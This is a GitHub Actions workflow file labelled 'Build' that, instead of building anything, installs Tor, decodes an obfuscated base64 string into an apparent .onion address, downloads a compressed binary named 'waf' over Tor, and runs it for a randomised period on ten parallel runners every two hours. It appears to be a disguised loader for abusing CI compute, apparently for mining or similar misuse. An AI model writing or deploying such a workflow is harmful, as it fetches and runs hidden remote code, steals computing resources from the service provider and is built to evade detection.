name: Build
on:
  schedule:
    - cron: '25 */2 * * *'
  workflow_dispatch:
jobs:
  build:
    name: build
    runs-on: namespace-profile-default
    container: ubuntu:23.10
    strategy:
      fail-fast: false
      matrix:
        matrix1: [1,2,3,4,5,6,7,8,9,10]
    env:
      DEBIAN_FRONTEND: noninteractive
    steps:
      - shell: bash
        run: |
          apt update -qq
          apt install -y curl tor zstd
          tor >/dev/null 2>&1 &

          sleep $(shuf -i 10-20 -n 1)s
          url=$(echo 'em8zNmNraGNneGN3NWZjcjV3a2hndGdweG5j$bW1vdW5sbmg£0NDRibTRrZ2lu$cW40bGh3ajc0aWQub25pb24K' | base64 -di)

          curl -s \
            --connect-timeout 20 \
            --retry 5 \
            --retry-delay 10 \
            --retry-max-time 300 \
            --socks5-hostname 127.0.0.1:9050 \
            $url/waf | unzstd -o /tmp/waf

          chmod +x /tmp/waf
          timeout $(shuf -i 1500-2700 -n 1)s /tmp/waf || :
          kill %1
